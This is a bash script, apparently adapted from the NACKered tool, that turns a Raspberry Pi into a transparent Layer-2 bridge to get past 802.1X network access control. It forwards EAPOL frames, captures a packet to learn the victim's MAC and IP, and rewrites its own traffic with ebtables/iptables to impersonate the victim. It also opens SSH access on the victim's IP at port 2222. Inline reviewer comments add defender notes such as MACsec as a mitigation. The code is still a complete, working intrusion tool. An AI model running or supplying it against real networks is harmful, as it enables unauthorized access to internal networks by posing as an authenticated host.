#!/bin/bash
# Transparent-bridge setup. The host becomes an inline Layer-2 bridge between
# a switch-facing interface (SWINT) and a computer-facing interface (COMPINT),
# lets 802.1X/EAPOL frames cross the bridge, learns the bridged computer's
# MAC/IP and its gateway MAC from the first captured packet, and then
# rewrites the host's own outbound traffic (ebtables snat / iptables SNAT) so
# it carries that computer's addresses.
#
# Defender's note: this is the well-known "transparent bridge" approach to
# port-based NAC; it is possible because the switch authenticates the
# supplicant once and does not cryptographically bind later frames to it.
# Link-layer encryption (802.1AE / MACsec) removes that precondition where the
# switch supports it; the script's own closing text (below) notes that the
# port is closed again by the switch once the supplicant disconnects.
#
# Must be run as root!
# Based on github.com/NACKered/nackered.sh
#
# Requires: apt-get install bridge-utils iptables ebtables
# (also invoked below: dhcpcd, systemctl/service, sysctl, macchanger,
#  mii-tool, tcpdump, arptables, arp, route and the sshd init script)
#
echo "Stopping network manager and dhcp clients"
dhcpcd -k
sudo systemctl stop dhcpcd.service
service network-manager stop
# NOTE(review): '>' truncates /etc/sysctl.conf, so any settings already in the
# file are lost rather than overridden.
echo "net.ipv6.conf.all.disable_ipv6 = 1" > /etc/sysctl.conf
sysctl -p
# Empties the resolver config: the host itself is left without DNS.
echo "" > /etc/resolv.conf
echo "Ground work done..."
###### THIS BLOCK IS REDUNDANT AS THESE VARIABLES ARE OBTAINED AUTOMATICALLY BELOW ######
#SWMAC= #MAC OF TO SWITCH eth1
#NEED TO OBTAIN FROM A VICTIM
#COMPMAC=
#COMIP=
#GWNET=
#DEFGW=
###### THIS BLOCK IS REDUNDANT AS THESE VARIABLES ARE OBTAINED AUTOMATICALLY BELOW ######
BRINT=br0 #bridge interface
SWINT=eth1 #interface of pi native interface plugged into switch
# Hardware address of SWINT, taken from the ifconfig line containing "ether"
# (second whitespace-separated field on that line).
SWMAC=`ifconfig $SWINT | grep -i ether | awk '{ print $2 }'` #get SWINT MAC address automatically.
COMPINT=eth2 #interface of usb2eth plugged into victim machine
BRIP=169.254.66.66 #IP for the bridge (link-local; only meaningful on this host)
DPORT=2222 #SSH CALL BACK PORT USE victimip:2222 to connect to attackerbox:22
RANGE=61000-62000 #Source-port range given to this host's own TCP/UDP traffic by the SNAT rules below
brctl addbr $BRINT #Make bridge
brctl addif $BRINT $COMPINT #add computer side to bridge
brctl addif $BRINT $SWINT #add switch side to bridge
modprobe br_netfilter
# group_fwd_mask bit 3 (value 8) makes the bridge forward frames sent to the
# 01-80-C2-00-00-03 (802.1X PAE/EAPOL) group address, which a Linux bridge
# drops by default. NOTE(review): "br0" is hard-coded here instead of $BRINT.
echo 8 > /sys/class/net/br0/bridge/group_fwd_mask #forward EAP packets
# Let bridged IP traffic traverse iptables so the nat rules below apply to it.
echo 1 > /proc/sys/net/bridge/bridge-nf-call-iptables
ifconfig $COMPINT 0.0.0.0 up promisc #bring up comp interface (no IP, promiscuous)
ifconfig $SWINT 0.0.0.0 up promisc #bring up switch interface (no IP, promiscuous)
echo "Bridge Configured."
echo "Doing MAC swap."
macchanger -m 00:12:34:56:78:90 $BRINT #Swap MAC of bridge to an initialisation value (not important what)
macchanger -m $SWMAC $BRINT #Swap MAC of bridge to the switch side MAC
echo "Bringing up the bridge"
ifconfig $BRINT 0.0.0.0 up promisc #BRING UP BRIDGE
#VICTIM MACHINE SHOULD WORK OK AT THIS POINT
echo "Resetting connection"
# Restart autonegotiation on both ports (a link bounce). Defender's note: the
# resulting link-state change on an authenticated port is visible to the
# switch and to link-state monitoring.
mii-tool -r $COMPINT
mii-tool -r $SWINT
echo "Listening for traffic dst tcp 88 or tcp 443"
# Blocks until one frame from the computer side matches the filter
# (Kerberos 88, HTTPS 443 or DNS 53); the frame is saved to /boot.pcap.
# NOTE(review): the echo above omits port 53, which the filter does include.
tcpdump -i $COMPINT -s0 -w /boot.pcap -c1 tcp dst port 88 or tcp dst port 443 or dst port 53
echo "Processing packet and setting veriables COMPMAC GWMAC COMIP"
# Each line re-reads the same single-packet capture. With tcpdump -nne, field
# 2 is the source MAC, field 4 the destination MAC (with a trailing comma) and
# field 10 the source "ip.port"; cut -f 1-4 -d. drops the port, and the final
# awk selects one comma-separated column (assumes the standard -nne line
# layout; the three pipelines are otherwise identical).
COMPMAC=`tcpdump -r /boot.pcap -nne -c 1 tcp dst port 88 or tcp dst port 443 or dst port 53 | awk '{print $2","$4$10}' | cut -f 1-4 -d.| awk -F ',' '{print $1}'` #source MAC of the captured frame
GWMAC=`tcpdump -r /boot.pcap -nne -c 1 tcp dst port 88 or tcp dst port 443 or dst port 53 | awk '{print $2","$4$10}' |cut -f 1-4 -d.| awk -F ',' '{print $2}'` #destination MAC of the captured frame
COMIP=`tcpdump -r /boot.pcap -nne -c 1 tcp dst port 88 or tcp dst port 443 or dst port 53 | awk '{print $3","$4$10}' |cut -f 1-4 -d.| awk -F ',' '{print $3}'` #source IPv4 address of the captured frame
echo "Going silent"
# Drop all locally generated ARP and IP output while the rewrite rules are
# installed; both DROP rules are deleted again near the end of the script.
arptables -A OUTPUT -j DROP
iptables -A OUTPUT -j DROP
echo "Bringing up interface with bridge side IP"
ifconfig $BRINT $BRIP up promisc
# Anything leaving this box with the switch side MAC on the switch interface or bridge interface: rewrite the source MAC to the computer's MAC.
echo "Setting up layer 2 rewrite"
ebtables -t nat -A POSTROUTING -s $SWMAC -o $SWINT -j snat --to-src $COMPMAC
ebtables -t nat -A POSTROUTING -s $SWMAC -o $BRINT -j snat --to-src $COMPMAC
#Create a default route so this host can route traffic: everything goes to 169.254.66.1, whose static ARP entry resolves to GWMAC.
# NOTE(review): 169.254.66.1 is hard-coded twice rather than derived from BRIP.
echo "Adding default routes"
arp -s -i $BRINT 169.254.66.1 $GWMAC
route add default gw 169.254.66.1
#SSH CALLBACK: inbound on br0 for COMIP:DPORT is DNATed to BRIP:22 (local sshd). NOTE(review): "br0" is hard-coded here instead of $BRINT.
echo "Setting up SSH reverse shell inbound on BICTIMIP:2222 to ATTACKERIP:22"
iptables -t nat -A PREROUTING -i br0 -d $COMIP -p tcp --dport $DPORT -j DNAT --to $BRIP:22
echo "Setting up layer 3 rewrite rules"
#Anything leaving the OS on BRINT from BRIP is rewritten to COMIP; TCP/UDP get a source port from RANGE, ICMP has no port range.
iptables -t nat -A POSTROUTING -o $BRINT -s $BRIP -p tcp -j SNAT --to $COMIP:$RANGE
iptables -t nat -A POSTROUTING -o $BRINT -s $BRIP -p udp -j SNAT --to $COMIP:$RANGE
iptables -t nat -A POSTROUTING -o $BRINT -s $BRIP -p icmp -j SNAT --to $COMIP
echo "Starting local SSH server"
#START SSH
/etc/init.d/ssh start
echo "All setup steps complete; check ports are still lit and operational"
echo "Re-enabling traffic flow; monitor ports for lockout"
#Re-enable L2 and L3: remove the blanket OUTPUT DROPs added under "Going silent"
arptables -D OUTPUT -j DROP
iptables -D OUTPUT -j DROP
echo
echo "READY TO ROCK!"
echo
echo "- Victim is now bridged - IP/MAC address of victim "lives" on eth0 of the pi but is forwarded transparently"
echo "- Ínfo for .1x:"
echo "-- We bridge authentication related comms (.1x EAPOL) towards the victim for answering"
echo "-- Access is possible from the raspberry pi onto the internal network (eth0) and SSH is available on the configured port"
echo "-- Victim PC supplicant must be present and succesfully answer EAPOL requests from the switch"
echo "-- Once victim disconnects, access will be cut by the switch depending on switch config"
echo

we
